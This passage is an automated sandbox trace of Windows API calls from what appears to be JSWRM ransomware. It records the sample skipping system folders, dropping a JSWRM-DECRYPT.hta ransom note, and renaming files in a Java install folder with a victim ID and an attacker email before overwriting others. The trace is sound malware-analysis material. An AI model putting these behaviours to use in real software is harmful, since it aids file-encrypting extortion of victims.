lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8af971e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2b6c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xab35b530, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="server", cAlternateFileName="")) returned 1 [0069.744] lstrcmpiW (lpString1="server", lpString2=".") returned 1 [0069.744] lstrcmpiW (lpString1="server", lpString2="..") returned 1 [0069.744] lstrcmpiW (lpString1="server", lpString2="...") returned 1 [0069.744] lstrcmpiW (lpString1="server", lpString2="windows") returned -1 [0069.744] lstrcmpiW (lpString1="server", lpString2="recovery") returned 1 [0069.744] lstrcmpiW (lpString1="server", lpString2="perflogs") returned 1 [0069.744] lstrcmpiW (lpString1="server", lpString2="documents and settings") returned 1 [0069.744] lstrcmpiW (lpString1="server", lpString2="$RECYCLE.BIN") returned 1 [0069.744] lstrcmpiW (lpString1="server", lpString2="system volume information") returned -1 [0069.744] lstrcmpiW (lpString1="server", lpString2="msocache") returned 1 [0069.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0069.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0069.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0069.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216f90 [0069.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.744] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jswrm-decrypt.hta")) returned 0xffffffff [0069.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216f90 | out: hHeap=0x1e0000) returned 1 [0069.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0069.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0069.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0069.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217250 [0069.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0069.745] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0069.745] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.745] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0069.746] CloseHandle (hObject=0x454) returned 1 [0069.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217250 | out: hHeap=0x1e0000) returned 1 [0069.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0069.746] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0069.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0069.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0069.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0069.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0069.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2179e0 [0069.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0069.747] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\jswrm-decrypt.hta")) returned 0x20 [0069.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2179e0 | out: hHeap=0x1e0000) returned 1 [0069.747] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0069.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0069.747] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8af971e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2b6c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x203b1def, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231ec0 [0069.747] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.747] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8af971e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2b6c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x203b1def, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0069.747] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.747] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.747] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x21, ftCreationTime.dwLowDateTime=0xab35b530, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xab35b530, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xabaa88bc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x11d0000, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="classes.jsa", cAlternateFileName="")) returned 1 [0069.747] lstrcmpiW (lpString1="classes.jsa", lpString2=".") returned 1 [0069.747] lstrcmpiW (lpString1="classes.jsa", lpString2="..") returned 1 [0069.747] lstrcmpiW (lpString1="classes.jsa", lpString2="...") returned 1 [0069.747] lstrcmpiW (lpString1="classes.jsa", lpString2="windows") returned -1 [0069.747] lstrcmpiW (lpString1="classes.jsa", lpString2="recovery") returned -1 [0069.747] lstrcmpiW (lpString1="classes.jsa", lpString2="perflogs") returned -1 [0069.747] lstrcmpiW (lpString1="classes.jsa", lpString2="documents and settings") returned -1 [0069.747] lstrcmpiW (lpString1="classes.jsa", lpString2="$RECYCLE.BIN") returned 1 [0069.747] lstrcmpiW (lpString1="classes.jsa", lpString2="system volume information") returned -1 [0069.747] lstrcmpiW (lpString1="classes.jsa", lpString2="msocache") returned -1 [0069.747] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0069.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="classes.jsa", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="classes.jsa", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="classes.jsa", lpUsedDefaultChar=0x0) returned 11 [0069.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0069.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="classes.jsa", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="classes.jsa", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="classes.jsa", lpUsedDefaultChar=0x0) returned 11 [0069.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0069.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0069.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.748] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0069.748] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.748] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9652818740925088) returned 0 [0069.748] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0069.749] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0069.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.749] CloseHandle (hObject=0xffffffff) returned 1 [0069.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0069.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0069.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0069.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0069.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0069.749] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f030 [0069.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.749] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.749] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\classes.jsa.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\classes.jsa.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.751] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0069.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0069.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0069.752] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x203b1def, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x203b1def, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x203b1def, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0069.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0069.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0069.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0069.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0069.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0069.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0069.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0069.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0069.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0069.752] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0069.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0069.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0069.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0069.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.752] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0069.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0069.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.752] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0069.752] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b1f9e6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b1f9e6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b1f9e6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x866c40, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="jvm.dll", cAlternateFileName="")) returned 1 [0069.752] lstrcmpiW (lpString1="jvm.dll", lpString2=".") returned 1 [0069.752] lstrcmpiW (lpString1="jvm.dll", lpString2="..") returned 1 [0069.752] lstrcmpiW (lpString1="jvm.dll", lpString2="...") returned 1 [0069.752] lstrcmpiW (lpString1="jvm.dll", lpString2="windows") returned -1 [0069.752] lstrcmpiW (lpString1="jvm.dll", lpString2="recovery") returned -1 [0069.753] lstrcmpiW (lpString1="jvm.dll", lpString2="perflogs") returned -1 [0069.753] lstrcmpiW (lpString1="jvm.dll", lpString2="documents and settings") returned 1 [0069.753] lstrcmpiW (lpString1="jvm.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.753] lstrcmpiW (lpString1="jvm.dll", lpString2="system volume information") returned -1 [0069.753] lstrcmpiW (lpString1="jvm.dll", lpString2="msocache") returned -1 [0069.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jvm.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jvm.dll", cchWideChar=7, lpMultiByteStr=0x345ebd8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jvm.dll", lpUsedDefaultChar=0x0) returned 7 [0069.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jvm.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jvm.dll", cchWideChar=7, lpMultiByteStr=0x345eba8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jvm.dll", lpUsedDefaultChar=0x0) returned 7 [0069.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0069.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0069.753] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b1f9e6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b1f9e6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b1f9e6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x58f, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Xusage.txt", cAlternateFileName="")) returned 1 [0069.753] lstrcmpiW (lpString1="Xusage.txt", lpString2=".") returned 1 [0069.753] lstrcmpiW (lpString1="Xusage.txt", lpString2="..") returned 1 [0069.753] lstrcmpiW (lpString1="Xusage.txt", lpString2="...") returned 1 [0069.753] lstrcmpiW (lpString1="Xusage.txt", lpString2="windows") returned 1 [0069.753] lstrcmpiW (lpString1="Xusage.txt", lpString2="recovery") returned 1 [0069.753] lstrcmpiW (lpString1="Xusage.txt", lpString2="perflogs") returned 1 [0069.753] lstrcmpiW (lpString1="Xusage.txt", lpString2="documents and settings") returned 1 [0069.753] lstrcmpiW (lpString1="Xusage.txt", lpString2="$RECYCLE.BIN") returned 1 [0069.753] lstrcmpiW (lpString1="Xusage.txt", lpString2="system volume information") returned 1 [0069.753] lstrcmpiW (lpString1="Xusage.txt", lpString2="msocache") returned 1 [0069.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Xusage.txt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Xusage.txt", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Xusage.txt", lpUsedDefaultChar=0x0) returned 10 [0069.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0069.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Xusage.txt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Xusage.txt", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Xusage.txt", lpUsedDefaultChar=0x0) returned 10 [0069.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0069.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0069.753] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0069.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.753] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0069.754] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\server\\Xusage.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\server\\xusage.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.754] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1423) returned 1 [0069.754] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.754] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x580) returned 0x23fc98 [0069.754] ReadFile (in: hFile=0x458, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x580, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x580, lpOverlapped=0x0) returned 1 [0069.755] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.755] WriteFile (in: hFile=0x458, 